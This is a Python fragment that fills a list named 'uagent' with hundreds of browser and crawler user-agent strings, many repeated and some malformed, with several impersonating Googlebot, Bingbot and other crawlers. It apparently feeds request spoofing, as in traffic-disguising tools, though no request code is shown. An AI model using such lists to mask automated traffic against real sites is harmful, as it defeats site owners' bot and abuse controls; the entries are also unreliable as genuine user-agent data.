uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57')
uagent.append('Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0')
uagent.append('Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g')
uagent.append('Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125')
uagent.append('Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)')
uagent.append('Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)')
uagent.append('Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)')
uagent.append('Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0')
uagent.append('Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10')
uagent.append('Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)')
uagent.append('Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)')
uagent.append('Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16')
uagent.append('Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)')
uagent.append('Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7')
uagent.append('BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0')
uagent.append('Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)')
uagent.append('Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)')
uagent.append('Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007')
uagent.append('BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57')
uagent.append('Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0')
uagent.append('Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g')
uagent.append('Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125')
uagent.append('Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)')
uagent.append('Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)')
uagent.append('Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)')
uagent.append('Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0')
uagent.append('Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10')
uagent.append('Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)')
uagent.append('Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)')
uagent.append('Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16')
uagent.append('Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)')
uagent.append('Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7')
uagent.append('BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0')
uagent.append('Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)')
uagent.append('Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)')
uagent.append('Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007')
uagent.append('BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179')
uagent.append('Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com')
uagent.append('Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)')
uagent.append('Mozilla/4.0 (compatible; Arachmo)')
uagent.append('Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)')
uagent.append('Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)')
uagent.append('Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)')
uagent.append('Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)')
uagent.append('BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)')
uagent.append('Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)')
uagent.append('Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)')
uagent.append('Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)')
uagent.append('Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )')
uagent.append('Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)')
uagent.append('Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)')
uagent.append('Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1')
uagent.append('Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)')
uagent.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 3.55)')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 2.00)')
uagent.append('Mozilla/5.0 (PLAYSTATION 3; 1.00)')
uagent.append('Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0')
uagent.append('Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)')
uagent.append('SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)')
uagent.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')
uagent.append('iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)')
uagent.append('Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))')
uagent.append('Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
uagent.append('Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57')
uagent.append('Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
uagent.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
uagent.append('Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0')
uagent.append('Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g')
uagent.append('Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)')
uagent.append('Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125')
uagent.append('Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)')
uagent.append('Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)')
uagent.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
uagent.append('Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)')
uagent.append('Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)')
uagent.append('Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0')
uagent.append('Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10')
uagent.append('Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)')
uagent.append('Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)')
uagent.append('Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)')
uagent.append('Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/uagent)')
uagent.append('Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16')
uagent.append('Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)')
uagent.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
uagent.append('Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)')
uagent.append('Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7')
uagent.append('BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0')
uagent.append('Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)')
uagent.append('Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)')
uagent.append('Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)')
uagent.append('Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)')
uagent.append('Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007')
uagent.append('BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)')
uagent.append('Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)')
uagent.append('Googlebot/2.1 (http://www.googlebot.com/bot.html)')
uagent.append('Opera/9.20 (Windows NT 6.0; U; en)')
uagent.append('Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)')
uagent.append('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)')
uagent.append('Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0')
uagent.append('Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16')
uagent.append('Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)')
uagent.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13')
uagent.append('Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)')
